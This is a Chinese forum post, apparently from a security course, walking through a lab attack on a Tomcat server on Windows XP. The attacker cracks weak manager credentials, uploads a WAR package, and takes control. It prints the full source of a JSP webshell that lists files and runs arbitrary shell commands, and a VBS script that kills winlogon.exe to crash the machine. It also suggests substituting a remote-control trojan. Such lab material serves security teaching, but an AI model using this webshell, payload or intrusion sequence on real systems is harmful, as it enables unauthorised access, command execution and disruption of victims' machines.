1、在XP系统上搭建Tomcat服务器平台；

2、在另一台虚拟机上利用弱口令漏洞上传木马程序，使得XP系统中木马。

实验步骤

一、搭建Tomcat服务器平台

1.安装JAVAJDK

环境变量的配置：(这里我的JAVA是按照默认安装地址安装的)

JAVA_HOME：C:\Program Files\Java\jdk1.7.0_79

Path：%JAVA_HOME%\bin

CLASSPATH：.%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tool.jar

Cmd输入命令查看

输入：java –version，检查是否安装成功。

1.png (43.07 KB, 下载次数: 0)

2021-4-28 21:07 上传

输入：javac，检查环境变量配置是否成功。

2.png (52.02 KB, 下载次数: 0)

2021-4-28 21:08 上传

2.安装Apache-Tomcat服务器

将压缩包解压，把整个文件夹拷贝至C盘。(免安装)

添加环境变量：

TOMCAT_HOME：C:\apache-tomcat-6.0.37

进入bin目录，点击startup.bat或者shutdown.bat可以启动或关闭服务器。

若测试不成功，则需添加完整的环境变量。(可选不是必选)

3.png (95.72 KB, 下载次数: 0)

2021-4-28 21:08 上传

点击startup.exe，启动服务器，在浏览器中输入：http://127.0.0.1:8080/，若显示如下界面，则服务器启动成功。

4.png (186.54 KB, 下载次数: 0)

2021-4-28 21:08 上传

二、登录管理员后台

登录管理员后台需要用户名密码，刚开始未设置，我们要自行设置。

5.png (112.93 KB, 下载次数: 1)

2021-4-28 21:08 上传

首先查看存放用户名密码的文件：在conf文件夹下的tomcat-users.xml，用记事本打开。将管理员账号添加进去：

其中各个rolename的含义：

6.png (25.94 KB, 下载次数: 1)

2021-4-28 21:08 上传

点击保存后重启服务器，回到登录界面，输入用户名密码，即可进入管理员界面：

7.png (76.33 KB, 下载次数: 1)

2021-4-28 21:08 上传

三、木马制作

Tomcat只支持war的后缀文件包的上传，因此，必须将jsp木马程序与其他木马一起打包成war包才能上传。

在安装有JDK的操作系统上，将所需要上传的木马放在同一个文件夹中，存放到C盘。

这里用到一个s.jsp的木马程序以及V.vbs病毒程序。

这里s.jsp的代码：

[AppleScript] 纯文本查看 复制代码

td,select,input,body

{

font-size:9pt;

}

A { TEXT-DECORATION: none }

Jsp File Manger Version0.5 --bY 慈勤强 [email]cqq1978@Gmail.com[/email]

String getDrivers()

/**

Windows系统上取得可用的所有逻辑盘

**/

{

StringBuffer sb=new StringBuffer("驱动器 : ");

File roots[]=File.listRoots();

for(int i=0;i

{

sb.append("");

sb.append(roots[i]+" ");

}

return sb.toString();

}

%>

String strThisFile="folder.jsp";

request.setCharacterEncoding("gb2312");

String strDir = request.getParameter("path");

if(strDir==null||strDir.length()<1)

{

strDir = "c:\\";

}

StringBuffer sb=new StringBuffer("");

StringBuffer sbFile=new StringBuffer("");

try

{

out.println("

当前目录： "+strDir+"

" + getDrivers() + "

\r\n");

File objFile = new File(strDir);

File list[] = objFile.listFiles();

if(objFile.getAbsolutePath().length()>3)

{

sb.append("

");

sb.append("上级目录

- - - - - - - - - - - \r\n");

}

for(int i=0;i

{

if(list[i].isDirectory())

{

sb.append("

");

sb.append(""+list[i].getName()+"");

sb.append("

");

//sb.append("\r\n");

}

else

{

String strLen="";

String strDT="";

long lFile=0;

lFile=list[i].length();

if(lFile>1000000)

{

lFile=lFile/1000000;

strLen="" + lFile + " M";

}

else if(lFile>1000)

{

lFile=lFile/1000;

strLen="" + lFile + " K";

}

else

{

strLen="" + lFile + " Byte";

}

Date dt=new Date(list[i].lastModified());

strDT=dt.toLocaleString();

sbFile.append("

");

sbFile.append(""+list[i].getName());

sbFile.append("

");

sbFile.append(""+strLen);

sbFile.append("

");

sbFile.append(""+strDT);

sbFile.append("

");

sbFile.append(" ");

sbFile.append("

\r\n");

//sbFile.append("");

}

}

//out.println(sb.toString()+sbFile.toString());

}

catch(Exception e)

{

out.println("操作失败： "+e.toString()+"");

}

%>

文件名称 文件大小 修改时间 文件操作

String strCmd="";

String line="";

StringBuffer sbCmd=new StringBuffer("");

strCmd = request.getParameter("cmd");

if(strCmd!=null)

{

try

{

//out.println(strCmd);

Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);

BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

while((line=br.readLine())!=null)

{

sbCmd.append(line+"\r\n");

}

}

catch(Exception e)

{

System.out.println(e.toString());

}

}

%>

if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)

{

%>

}

%>

这里V.vbs的代码：

[AppleScript] 纯文本查看 复制代码if MsgBox("你是在上网络信息安全的课吗?",vbYesNo,"提示")=vbyes then

msgbox "你真是在上网络安全课啊，这么好丫!"

else

msgbox "还不承认? 作为惩罚，折腾你一下",64,"严重警告!!!!!!"

Set ws = CreateObject("Wscript.Shell")

wscript.sleep 1200

ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide

end if

运行cmd，使用cd命令将目录切换到刚刚存放的c文件夹下：

8.png (38.04 KB, 下载次数: 1)

2021-4-28 21:08 上传

使用命令将木马程序打包：

jar cvf shell.war *

若提示jar不是内部命令，请回到JDK安装步骤查看环境变量是否配置正确。

成功时的命令提示如下：

9.png (66.95 KB, 下载次数: 1)

2021-4-28 21:08 上传

四、漏洞入侵

访问目标网站

使用另一台电脑输入以下网址：

http://192.168.41.131:8080/(对应IP地址要改)

访问成功将出现以下界面：

10.png (117.38 KB, 下载次数: 0)

2021-4-28 21:08 上传

弱口令扫描

打开Apache Tomcat crack软件，界面如下：

11.png (51.57 KB, 下载次数: 0)

2021-4-28 21:08 上传

设置扫描网段，点击add按钮添加；点击start按钮开始扫描。扫描成功将获得口令和密码。

12.png (86.02 KB, 下载次数: 1)

2021-4-28 21:08 上传

上传木马

利用前面扫描到的口令密码登录管理员网页，将之前做好的war包上传至服务器:

13.png (33.68 KB, 下载次数: 0)

2021-4-28 21:08 上传

14.png (13.95 KB, 下载次数: 0)

2021-4-28 21:08 上传

查看木马

在地址栏中输入网址：

http://192.168.41.131:8080/shell/s.jsp

即可看到对方电脑中所有的文件目录：

15.png (68.21 KB, 下载次数: 0)

2021-4-28 21:08 上传

运行木马

找出之前一并上传的木马文件V.vbs，利用下面的执行功能让其在被害者电脑上运行：

c:\apache-tomcat-6.0.37\webapps\shell\V.vbs -install

16.png (69.22 KB, 下载次数: 0)

2021-4-28 21:08 上传

此时在被攻击者电脑上会自运行病毒程序，即中病毒了。也可将病毒用灰鸽子木马替换实现远程控制。

17.png (34.82 KB, 下载次数: 0)

2021-4-28 21:08 上传

18.png (35.01 KB, 下载次数: 0)

2021-4-28 21:08 上传

点击“否”的话要小心哦，因为电脑会变成“蓝屏”，不过不用怕，其实就蓝屏一会儿就帮你重启啦~不相信可以返回去看V.vbs的代码哦~